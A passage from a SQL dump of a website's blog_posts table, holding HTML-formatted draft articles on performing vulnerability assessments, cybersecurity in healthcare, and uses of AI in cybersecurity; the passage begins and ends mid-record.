dir=\"ltr\">2. Integrate with Patch Management</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Coordinate your vulnerability assessments with your patch management processes to ensure timely remediation of weaknesses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. Regular Scanning</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Threat landscapes evolve quickly. Schedule regular vulnerability scans to stay ahead.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. Monitor and Stay Updated</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Register for security update newsletters, like NVD (National Vulnerability Database), to track new CVEs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Staying Updated on the Latest Vulnerabilities</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is a constantly evolving field, and staying informed about emerging threats is critical. Here\'s how to stay up to date.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Subscribe to Vulnerability Databases</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">National Vulnerability Database (NVD)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Mitre CVE Database</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Use RSS Feeds and Alerts</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Set up alerts for new CVEs or significant updates affecting your technology stack.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><b><strong class=\"font-bold\">Follow Industry Blogs and News</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\">Cybersecurity blogs, newsletters, and forums provide valuable commentary about emerging threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\"><b><strong class=\"font-bold\">Use Social Media Communities</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\">Joining LinkedIn and Twitter groups for cybersecurity helps you learn from your peers.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Performing a vulnerability assessment is the foundation of a strong cybersecurity strategy. With tools like Nessus and OpenVAS, and a clear understanding of CVE and CVSS ratings, addressing critical vulnerabilities becomes much more manageable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Take the first step and start implementing vulnerability assessments today. Remember, staying informed and proactive is your best line of defense against cyber threats. Stay protected, stay prepared!</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 21:53:27', '2026-01-12 21:41:44', 'Information Security', 'How to Perform a Basic Vulnerability Assessment', '', NULL),
(56, 'Cybersecurity in the Healthcare Industry', 'cybersecurity-in-the-healthcare-industry', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Cybersecurity Matters in Healthcare</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The healthcare industry handles some of the most sensitive and personal data—patients\' medical histories, insurance details, prescription records, and more. This information is not only critical for providing care but also extremely valuable to cybercriminals. A single breach can expose thousands of records, leading to financial loss, erosion of patient trust, and potential harm to individuals.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the growing dependence on digital tools, electronic health records (EHRs), and interconnected devices, the healthcare sector has become a prime target for cyberattacks. This makes cybersecurity more than just an IT issue—it’s a vital concern for regulatory authorities, healthcare providers, and policymakers alike.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Major Cybersecurity Threats in Healthcare</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The healthcare industry faces a variety of cybersecurity threats, including but not limited to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Ransomware Attacks</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These attacks lock healthcare organizations out of their systems until a ransom is paid, crippling the ability to deliver timely care.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Breaches expose sensitive patient information, which can be sold on the dark web or used for identity theft.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Insider Threats</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employees, whether through negligence or malicious intent, can compromise data security.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Attacks on IoT Medical Devices</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Internet of Things (IoT) devices, such as pacemakers and insulin pumps, can be manipulated if not properly secured, posing risks to patient safety.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Scams</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emails designed to trick employees into revealing credentials can provide attackers access to critical systems.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Steps to Secure Healthcare Information</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To protect sensitive healthcare data, organizations must adopt robust cybersecurity measures. Here are some best practices:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Encryption</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encrypting health information ensures that even if data is intercepted, it remains unreadable to unauthorized users.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Access Controls</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing stricter access controls (such as multi-factor authentication) ensures that only authorized personnel can access sensitive data.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regular Security Training</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Educating staff about cybersecurity threats, such as phishing, helps reduce human error—a significant vulnerability in data security.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Routine Vulnerability Assessments</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Conducting frequent security audits and penetration testing can identify and address weaknesses before attackers exploit them.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Backup and Recovery Plans</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Regularly backing up data and having disaster recovery plans in place minimizes downtime in the event of an attack.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding the Regulatory Landscape</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Healthcare organizations must not only secure their systems but also comply with laws and regulations governing data security. Key regulations include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">HIPAA (Health Insurance Portability and Accountability Act)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Enforced in the United States, HIPAA mandates strict standards for protecting healthcare data, including privacy rules, breach notification requirements, and risk assessments.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">GDPR (General Data Protection Regulation)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Applicable to the European Union, GDPR requires organizations to safeguard personal data and grants individuals significant rights over their information. Healthcare organizations handling EU patient data must comply, even if located outside the EU.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">NIST Cybersecurity Framework (National Institute of Standards and Technology)</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While not healthcare-specific, this U.S. framework provides a robust guide for managing cybersecurity risks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">ISO/IEC 27001</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A global standard, this certification can help healthcare providers demonstrate leadership in securing information systems.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding and adhering to these regulations ensures healthcare organizations avoid penalties while maintaining patient trust.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Role of Key Stakeholders</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Compliance Officers</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Compliance officers are responsible for ensuring that healthcare organizations meet legal and regulatory requirements. Their role includes conducting audits, implementing policies, and addressing non-compliance issues proactively.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">IT Security Experts</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT security experts develop and implement technical safeguards to protect healthcare data. They also monitor networks for unusual activity and respond to breaches.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Healthcare Professionals</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While not cybersecurity specialists, healthcare providers must adhere to best practices, such as using strong passwords, reporting suspicious activity, and participating in training sessions.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Policy Makers and Regulatory Authorities</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Policy makers play a crucial role in drafting and updating cybersecurity regulations. Their decisions directly impact how healthcare organizations approach data protection.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Case Studies in Cybersecurity Success</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Case Study 1</strong></b>: A U.S. hospital implementing real-time monitoring tools detected unusual activity in its network, preventing a potential ransomware attack. By acting swiftly, they saved patient records and avoided service interruptions.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Case Study 2</strong></b>: A healthcare organization in the EU, facing repeated phishing attacks, introduced mandatory two-factor authentication. Within three months, incidents dropped by 60%, demonstrating the effectiveness of proactive measures.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Case Study 3</strong></b>: A global healthcare provider adopted the NIST Cybersecurity Framework and trained all employees annually. Their robust approach reduced vulnerabilities and earned them ISO/IEC 27001 certification.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Don\'t Forget</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity in healthcare is not optional—it is a necessity. The stakes are incredibly high, and every stakeholder has a role to play. Healthcare professionals and IT security experts must work hand in hand to implement best practices, while policymakers and compliance officers need to ensure regulations evolve to keep pace with emerging threats.</p>', '', NULL, NULL, 1, 'draft', '2025-01-26 21:14:02', '2026-01-12 21:41:44', 'Information Security', 'Cybersecurity in the Healthcare Industry', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(57, 'How Can AI Transform Cybersecurity? Use Cases and Insights', 'how-can-ai-transform-cybersecurity-use-cases-and-insights', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rise of digitalization has brought an increasing number of sophisticated cyber threats. For IT professionals, cybersecurity learners, and enthusiasts, staying ahead of these threats is no longer optional—it’s essential. Artificial intelligence (AI), with its ability to learn and adapt, is now at the forefront of modern cybersecurity strategies, offering powerful tools and insights to protect systems and data. This article will explore how AI integrates into cybersecurity, its use cases, benefits, challenges, and what the future holds for this innovative field.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to AI in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Artificial intelligence utilizes machine learning models, algorithms, and data analytics to perform tasks that traditionally required human intelligence. When it comes to cybersecurity, AI is employed to identify, analyze, and respond to threats faster and more effectively than traditional methods. From processing large volumes of data to detecting subtle signs of intrusion, AI has become a game-changer in the fight against cybercrime.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Importance of AI in Detecting and Preventing Cyber Threats</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Traditional security methods often rely on predefined rules that cybercriminals are increasingly finding ways around. AI, on the other hand, excels in detecting anomalies by analyzing patterns in user behavior, network traffic, and system logs.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance, instead of simply blocking malware based on known signatures, AI can identify and neutralize new, never-before-seen attacks (zero-day threats). This proactive approach allows organizations to stay ahead of malicious actors, ensuring better protection for sensitive systems and data.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-Life Use Cases of AI in Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI applications are already making waves in numerous cybersecurity practices. Here are some practical use cases for better understanding its potential:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Threat Detection and Response</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI-powered solutions like SIEM (Security Information and Event Management) can monitor and analyze vast amounts of log data in real-time. They identify unusual activities that might signal a breach and trigger automated responses to prevent escalation.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Fraud Prevention</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Financial institutions use AI to detect unusual transaction patterns that might indicate fraud. Models analyze things like transaction amounts, locations, and methods, allowing organizations to identify fraudulent behavior the moment it appears.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Endpoint Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Endpoint detection systems equipped with AI continuously monitor devices for suspicious behavior. For example, solutions like CrowdStrike use AI to detect the execution of unknown malicious files and stop them instantly.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Phishing Defense</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">AI systems can spot phishing attempts by analyzing the content, tone, and structure of emails. Tools like Google’s AI email scanner ensure that phishing emails are flagged before reaching inboxes.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Predictive Risk Analysis</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By analyzing attack patterns, AI can predict potential risks before they materialize. This enables organizations to shore up vulnerabilities and prioritize resources effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits and Challenges of Integrating AI in Cybersecurity Practices</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Benefits</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Speed and Scalability</strong></b>: AI can analyze data at faster speeds than any human, making it ideal for large-scale operations and real-time decision-making.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Proactive Threat Detection</strong></b>: AI is designed to spot anomalies and recognize attack patterns before they can do harm.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Cost Efficiency</strong></b>: While initial investment may be high, AI reduces the long-term costs associated with breaches and remediation.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Challenges</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">False Positives</strong></b>: Even with advanced algorithms, AI can occasionally flag harmless activities as threats, adding extra work for IT teams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Lack of Skilled Professionals</strong></b>: Integrating AI requires expertise in both cybersecurity and machine learning, making skilled talent a critical factor.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Ethical Concerns</strong></b>: AI systems often require access to sensitive data, raising questions about privacy and ethics.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] 